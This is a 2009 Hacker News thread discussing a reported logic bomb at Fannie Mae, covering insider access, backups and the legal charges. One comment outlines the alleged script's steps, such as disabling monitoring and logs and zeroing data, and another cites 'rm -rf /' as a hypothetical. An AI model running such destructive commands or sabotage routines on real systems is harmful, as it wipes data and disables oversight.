Hacker Newsnew | past | comments | ask | show | jobs | submitlogin
Fannie Mae Logic Bomb Would Have Caused Weeklong Shutdown (wired.com)
28 points by albertni on Jan 29, 2009 | hide | past | favorite | 22 comments


I'm curious if Wired's account is to be taken as the literal truth (I know, bear with me). Why is someone being fired for a single scripting error? What the hell is QA for?

More-over how stupid does Fanny Mae management be to fire someone who can write and deploy logic bomb that meticulous in half a day? Let alone let any of their staff have that level of data center access.

I'm sure we aren't seeing the full picture here.


"More-over how stupid does Fanny Mae management be to fire someone who can write and deploy logic bomb that meticulous in half a day? Let alone let any of their staff have that level of data center access."

Among their lack of oversight problems, this seems to be one of the smallest.


Or management oversights is symptomatic of Fanny Mae generally.


In a bit of a shadow of Office Space, the alleged bomb planter's employer was named OmniTech.


I wonder if the reporter meant OmniTI, http://omniti.com/.


Damn. You beat me to it.


This is why when an investment bank fires a trader, the security guard is there to pick him up after the meeting with his boss ends.

They mail you the stuff from your desk in boxes.


You know, the really nasty attackers aren't going to waste time overwriting data with zeroes.


"Despite Makwana's termination, Makwana's computer access was not immediately terminated"

Wow.


I don't find it that surprising... usually you'd hire people you can trust in the first place. And the guy might want to pick up his stray files before leaving. It sounds harsh to me to cut off everything before even talking to the guy.


This shows how fragile large systems really are.


If a grumpy Google engineer managed to cause their Chubby service (synchronized file write service) to start corrupting random files, then that might have a big impact on the integrity of end-user data.

My point is, even a well-designed system is vulnerable when someone has access to its internals. Give me a system and a day, and I could probably think of a few subtle (or not-so-subtle) ways to break it for the purpose of inflicting damage.


And as long as you don't rely on security-by-pageful-of-blank-lines, you just may get away with it too!


I looked in the indictment for any details about the code he posted. No such luck; on a tangent, this is confusing.

From the article:

"A logic bomb ... would have decimated all 4,000 servers at the company, causing millions of dollars in damage"

From the indictment:

"The defendant ... did knowingly cause and attempt to cause ... damage without authorization to a protected computer, and by such conduct caused and would, if completed, have caused loss to Fannie Mae during any one year period aggregating at least $5,000 in value."

So...

1) Why are they charging him with "attempting to cause at least $5,000 in damage" when the true damage would allegedly have been in the millions?

2) It's hard to believe "[the code] would have decimated all 4,000 servers at the company". Let's consider the worst case scenario, which is that all 4,000 computers run the infected script at 9AM with administrator privileges. Would something like 'rm -rf /' really decimate the server? If they kept backups of each server, could the IT guys simply swap in old backups?

... Now that I've talked it out, it seems likely that really would knock the server farm offline for about a week. It would be difficult to swap in backups of 4,000 servers in a timely fashion. That's a lot of boxen.


Check out the FBI affidavit at http://blog.wired.com/27bstroke6/files/fannie_complaint.pdf.

The accused seems to have done the following - SSHed in with his user id and gained root access to a dev server. The DHCP address for the client IP was last assigned to his laptop

- Created a cron job that ran a script. The script checked whether it was January 31st, 2009. If so, it did the following

   - Disable internal monitoring systems to disable alerts
   - Create a list of all servers,walk through them and disable logisn and clear out logs
   - Wipe out data by overwriting with zeros
   - Uninstall software and turn off the machines
   - Clear itself out and zero out the root filesystem
The 'smoking gun' seems tenuous at best- the person accused seems to use similar naming conventions for his personal temp files (the .x, .y format) which I agree is unconventional. I think the real smoking gun is the fact that his laptop and his login was used


I wish I could give you 20 karma for that. Nice sleuthing!

Do you think his attack would have worked?


Because that's the name of the crime. Attempting to cause damage under $5000 is probably a lesser charge.

"Millions" is indeed at least $5000, no?


Certainly. It just seemed strange.


4000 boxen? Just restoring from backups? There's a quick way to completely fail any RTO you might have set..

1 week would give you 2.5 minutes for each box.. (obviously you could do things in parallel - but not all at once) If you had to pull backups off tape - then you'd be limited by number of tape drives - 100 maybe? If you were pulling it all in off a SAN/VTL then you've still got a whole pile of bottlenecks - disk speed, fabric, network, etc..

Remember: Backups are not a DR solution. (and conversely - a hot-site or equivalent is not a backup solution!)


DR?


Disaster Recovery, presumably.


That number is just the way the legal system works.

If you steal a something that's worth $100k, it's grand theft... which is, I believe, defined as anything over $500. (Depends on your state, probably.)

$100k and $500 are very different numbers; $500 is just the line that divides the legal slots that crimes fall in.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: